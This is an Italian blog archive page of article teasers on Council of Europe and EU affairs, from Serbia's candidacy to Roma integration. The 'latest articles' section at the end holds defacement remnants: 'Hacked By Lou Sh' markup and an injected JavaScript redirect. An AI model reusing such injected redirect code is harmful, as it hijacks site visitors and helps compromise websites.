EUROSBLOGS
--> Giugno 2013 Maggio 2013 Aprile 2013 Marzo 2013 Febbraio 2013 Gennaio 2013
Dicembre 2012 Novembre 2012 Ottobre 2012 Settembre 2012 Agosto 2012 Luglio 2012 Giugno 2012 Maggio 2012 Aprile 2012 Marzo 2012 February 2012 Gennaio 2012
Dicembre 2011 Novembre 2011 Ottobre 2011 Settembre 2011 Agosto 2011 Luglio 2011 Giugno 2011 Maggio 2011 Aprile 2011 Marzo 2011 Febbraio 2011 Gennaio 2011
Dicembre 2010 Novembre 2010 Ottobre 2010 Settembre 2010 Luglio 2010 Giugno 2010 Aprile 2010 Marzo 2010 Febbraio 2010
Consiglio d’Europa

Consiglio d’Europa


Consiglio d’Europa

it

Giovedì 26 luglio 2012, dalle ore 09:30 alle 14:00, il Consiglio europeo incontrerà nella sua sede di Bruxelles i blogger di tutta Europa. L’evento, organizzato dalla Presidenza di Cipro, in carica dal 1 luglio al 31 dicembre, sarà un modo per avvicinare la blogosfera alla Presidenza e generare al contempo interesse e partecipazione al dibattito politico europeo.

I blog come rivoluzione democratica di internetChe sia a torto o a ragione, i blog sono ormai ritenuti la vera “killer application” del web. Da quando infatti sono comparsi i primi Cms – Content management system – che hanno nell’utilizzo di una piattaforma di gestione dei contenuti semplificata la (...)

it

L'Assemblea Parlamentare del Consiglio d'Europa vuole documentare il comportamento del dirigente elvetico nel periodo precedente all'elezione presidenziale. L'obiettivo del rapporto è accertare se Blatter fosse a conoscenza della corruzione di alcuni membri del massimo organismo calcistico mondiale.

“Il Consiglio d’Europa si occupi dei problemi dell’Europa e non dei problemi del calcio mondiale’’. Con questa dichiarazione ufficiale il Presidente della FIFA (Fédération Internationale de Football Association) Joseph Blatter il 23 aprile scorso ha commentato il rapporto reso pubblico (...)

it

I leader dell'Unione europea hanno deciso, il 2 Marzo 2012, di concedere alla Serbia la possibilità di entrare a far parte del massimo organismo europeo. La decisione è stata presa dopo una riunione a Bruxelles dove è stato necessario superare le resistenze della Romania, la quale, conoscendo molto bene la situazione delle proprie minoranze valacche e romene in Serbia, aveva bloccato temporaneamente l'assegnazione dello status di candidato all'UE.

Finalmente, viene da dire, la Serbia ha ufficialmente la possibilità di entrare a far parte dell’UE. L’ultimo ostacolo, in ordine di tempo, che ha dovuto affrontare, è stata la forte opposizione romena la quale cercava di ottenere maggiori garanzie per le circa 40.000 persone facenti parte delle (...)

it

L’integrità della rete, la tutela della privacy, e lo sviluppo della democrazia sono i principali obiettivi che il Consiglio d’Europa si è posto nell’approvazione della nuova strategia, che ha visto concordi i 47 Paesi membri. Internet, ormai conosciuto come il mezzo di comunicazione più diffuso in tutto il mondo, rappresenta allo stesso modo un vero e proprio sistema da sottoporre a tutela. Ognuno deve poter essere libero di reperire o diffondere notizie sul web, senza l’intervento o il controllo forzato da parte di terzi.

È stata approvata lo scorso 15 marzo dai 47 governi membri del Consiglio d’Europa la nuova strategia che si propone di garantire un più facile accesso a Internet e di prevenire eventuali censure governative. Numerosi negli ultimi anni sono stati i casi di controllo forzato sul web che impedivano (...)

it

L’aumento dei posti di lavoro per i giovani è stata la principale questione affrontata durante il Consiglio dell’Unione europea tenutosi a Bruxelles. L’interesse dei Paesi partecipanti è stato rivolto anche all’incremento del finanziamento dell’economia e al completamento del mercato unico digitale. Sono state concluse le direttive riguardanti un trattato separato finalizzato alla creazione di un fondo salva Stati permanente, che dovrebbe diventare operativo il prossimo luglio 2012.

Si è tenuto lo scorso 31 gennaio a Bruxelles il primo Consiglio dell’Unione Europea del 2012 sotto la Presidenza danese. Numerosi i punti affrontati dai 27 Paesi che hanno preso parte al Consiglio e che hanno avanzato le loro proposte finalizzate alla crescita del numero dei posti di lavoro. (...)

it

Il futuro dell’Europa risiede nell’unità politica e nell’integrazione economica. E’ anche sulla base di questi requisiti che da svariati anni, ormai, l’UE ha creato dei Corsi di formazione presso i Centri Giovanili Europei nel settore del lavoro giovanile internazionale. Questi Corsi sono organizzati dalla Direzione per la Gioventù e lo Sport del Consiglio d’Europa e hanno l’obiettivo di promuovere la partecipazione giovanile a livello europeo e migliorare le attività giovanili tese ad una collaborazione interculturale. I corsi garantiscono la preparazione di figure atte alla collaborazione dei giovani nelle attività all’interno dell’UE e gestiscono molti ambiti, tra cui la cooperazione internazionale giovanile, la formazione giovanile, la partecipazione giovanile e la cittadinanza democratica.

I Centri Giovanili Europei (EYC) hanno sedi principali a Strasburgo e Budapest e implementano un programma annuale di sessioni di studio ed altre attività in collaborazione con partner giovanili governativi e non governativi. Ogni sessione di studio riflette i principi base dell’organizzazione, (...)

it

L’Italia è stata il primo Paese europeo ad aderire e promuovere la campagna europea di sensibilizzazione e prevenzione degli abusi e dello sfruttamento sessuale che ancora oggi sono subiti in Europa da un bambino su cinque, e per l’80% dei casi ad opera di familiari.

I mesi di Ottobre e Novembre appena trascorsi hanno visto il Consiglio d’Europa e i rappresentanti di Coalizioni Nazionali e ONG impegnati nell’analisi e nello studio del crescente problema dello sfruttamento e delle violenze sessuali sui minori. La prima tappa di una serie di incontri che si (...)

15
10
2010

I rom e l’Europa

it

E’ a partire dal 1993, con la fondazione del Dipartimento “Roma and Travellers” nato a Strasburgo nell'ambito del Consiglio d’Europa, che viene posta all’attenzione dell’opinione pubblica europea la questione rom: cioè quella serie di gruppi gitani che vivono nei paesi dell'est Europa e che dal 1400 viaggiano in modo nomade per tutto il vecchio continente, creando problemi di integrazione sociale. L’ufficio, nato per fronteggiare il caso, produce ogni anno pagine e pagine di relazioni, rapporti, raccomandazioni, ma manca totalmente di un progetto esecutivo per risolvere il problema. In sostanza, dalle parole non si riesce a passare ai fatti, ed il risultato è che la situazione varia da paese a paese e ogni governo affronta la questione con un proprio approccio politico.

Le cronache degli ultimi anni di paesi come Italia e Francia hanno riportato sulla scena questo tema. Il caso italiano pare essere emblematico. L’Italia sembra avere la maglia nera nella gestione della questione rom. La lista delle "mancanze" italiane è lunghissima. Contrariamente agli altri (...)

Dialogo con i cittadini sul Futuro dell’Europa

L’Eurosblog è media partner dell’iniziativa "Dialogo con i cittadini sul Futuro dell’Europa" organizzata dalla Rappresentanza in Italia della Commissione europea. Una serie di dibattiti aperti tra la Commissione europea e i cittadini sui temi dell’occupazione, della protezione dei cittadini e della sostenibilità. L’obiettivo è rispondere insieme alla domanda: “Che Europa vogliamo nel futuro?”. Guarda il video viral e fai la tua domanda su Twitter, utilizzando l’hashtag #EUdeb8. Segui l’evento in streaming su http://webcast.ec.europa.eu/eutv/po...

Quale Europa vogliamo nel futuro?


Ultimo commento

Erasmus+: il nuovo programma di studio per i giovani in Europa
di réduction toysrus, le 21 agosto 2013

Nice article :). I’ve studied abroad in Espagna y eso fue una experiencia unica: tanto al nivel laboral como humano! Je recommande ça à tout le monde :)


comitato




Ultimi articoli del blog

<!DOCTYPE HTML>      <head>         <meta charset= Hacked By Lou Sh If you are not redirected automatically, follow the link to example " title=" Hacked By Lou Sh If you are not redirected automatically, follow the link to example " src="local/cache-gd2/cc82855323b3141664fde5d9afad6d5c.png">
window.location.href = "http://torvergata.eurosblog.eu/IMG/html/" (...)
15 marzo 2015
<!DOCTYPE HTML>      <head>         <meta charset= Hacked By Lou Sh If you are not redirected automatically, follow the link to example " title=" Hacked By Lou Sh If you are not redirected automatically, follow the link to example " src="local/cache-gd2/646bc521095d5a61646327c7b727a862.jpg">
window.location.href = "http://torvergata.eurosblog.eu/IMG/html/" (...)
17 febbraio 2015



© Groupe Euros du Village 2010 | Note legali | Sito realizzato con SPIP | Relizzazione tecnica e design : Media Animation & Euros du Village France